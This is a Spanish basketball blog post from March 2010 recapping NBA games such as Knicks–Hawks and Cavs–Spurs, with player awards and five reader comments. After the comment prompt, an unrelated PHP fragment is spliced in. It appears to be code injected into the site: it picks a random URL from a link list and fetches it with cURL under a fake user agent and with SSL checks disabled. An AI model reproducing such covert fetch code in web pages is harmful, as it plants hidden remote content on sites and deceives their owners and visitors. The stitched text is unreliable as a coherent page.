La Crónica (08/03/2010)

09 de March de 2010 por txusma

Jornada curiosa, con grandes dosis de emoción y buen juego. Mucho más de lo que nos esperábamos a priori.

De hecho, el partido más emocionante fue el Hawks@Knicks, resuelto con un tapón impresionante de Wilson Chandler en el último segundo. Los Hawks estuvieron muy fallones e inusualmente timoratos en defensa. Gallinari los acribilló, bien secundado por David Lee. Sergio, titular anoche, estuvo mejor de lo que indican sus números, con el equipo funcionando bien bajo su batuta y con una encomiable actitud defensiva. No era de la partida en los instantes decisivos, no obstante.

Otro duelo emocionante fue el Spurs@Cavs. Sin Shaq, LeBron y Jamison retirándose al final de la primera parte, los Cavs fueron capaces de alcanzar su 50ª victoria en detrimento de los tejanos. Ginobili se salió por todos lados pero echaron excesivamente de menos a Tony Parker, cuando Mo Williams y Delonte camparon a sus anchas en el momento que el encuentro alcanzó el filo.

Los Grizzlies, sin Zach Randolph, sufrieron más de lo previsto contra los Nets. Pero Marc Gasol impuso galones y se comió literalmente a Brook Lopez, demostrando lo que ya sabíamos: Que hoy por hoy es el mejor pívot de su generación.

Pudimos disfrutar de otro de esos partidos locura de los Warriors de Don Nelson. Perdieron, como casi siempre, pero les pusieron las cosas verdaderamente complicadas a unos fortísimos Hornets. David West 28-13; Okafor 22-11; Thornton 28-6… y Darren Collison hasta 20 asistencias para doblegar a los “guerrillerillos”. Por parte de los de la bahía de Oakland, el mejor fue un fulano llamado Reggie Williams, que no tiene ni foto en las principales páginas especializadas. A veces nos perdemos con tanto movimiento “kamikaze” de este equipo.

Por último, los Mavs alcanzaron su 12ª seguida a costa de los Wolves. Al Jefferson se salió… pero si en los Mavs hasta Shawn Marion se pone a nivel estelar, los demás lo tienen muy chungo.

PREMIOS

MVP: David West continúa liderando a New Orleans ayudado por el empuje de los dos rookies del equipo. 28 puntos y 13 rebotes para él. Y en Dallas, Shawn Marion se disfrazó de rubio alemán para anotar 29 puntos, recoger 14 rebotes y robar 3 balones.

Rookie: Lo de la pareja de NO empieza a no tener nombre. 28 puntos para Marcus Thorton y ¡20! asistencias para Darren Collison… Y parecía que ambos no se iban a comer ni un colín esta campaña.

Sorpresa: No le estaba sentando bien la segunda parte de la temporada a Danilo Gallinari pero ayer recuperó la agresividad y anotó 27 puntos en la victoria de los Knicks frente los Hawks. ¿Y quien es ese Reggie Williams capaz de anotar 28 puntos con los Warriors?

Decepción: Partido para emmarcar el de Roger Mason: 1 de 10 con 0 de 8 en triples. Para emmarcar y tirarlo a la basura…

Esfuerzo en vano: Hacía varios meses que Manu Ginobili no pasaba de la treintena de puntos pero al contrario que la otra vez, ayer no le sirvió para nada. 38 puntos, 7 rebotes, 5 asistencias y derrota frente los Cavs B. Los 30 puntos de Courtney Lee, los 28 con un 11 de 13 de Anthony Morrow o el 25-10-6 de Josh Smith y sobretodo el 36-13 de un enrabietado Al Jefferson también merecen premio de consolación.

Comenta

5 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Reggie Williams es otro D-Leaguer que se trae Nelson, de hecho creo que estaba promediando cerca de 27 ppp, no se cuantos lleva ya este año, Hunter, Tolliver…

      Citar

  2. Txusma dice:
    #2

    Y digo yo, el año que viene no hace falta que haya D-League, no? Cada equipo que envie a uno de sus jugadores a los Warriors para que se foguee y listos.

      Citar

  3. Love Denise dice:
    #3

    Don Nelson es un poco friki del baloncesto, aleros reconvertidos a pivots, defensa nula, juego alocado, no sé no sé, no me gustaría tenerlo en mi equipo, aunque respeto su trayectoria.

      Citar

  4. Dantley2 dice:
    #4

    Que conste en acta que ya os avisé de Reggie Williams el otro día antes de que esto pasara

    Equipos ACB, escuchadme, fichad a Reggie Williams. Otro jugón ACB sería Lester Hudson.

      Citar

  5. sergio dice:
    #5

    Estaba hechandole un ojo a las estadisticas de LeBron este año y me doy cuenta de que encima esta es la mejor temporada de su historia:

    Record de asistencias por partido con 8.5, segunda maxima anotacion por partido en una temporada, la mejor en porcentaje de tiro y segunda en triples y libres,… y por supuesto la mejor en valoracion. No se donde esta el tope de este hombre…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>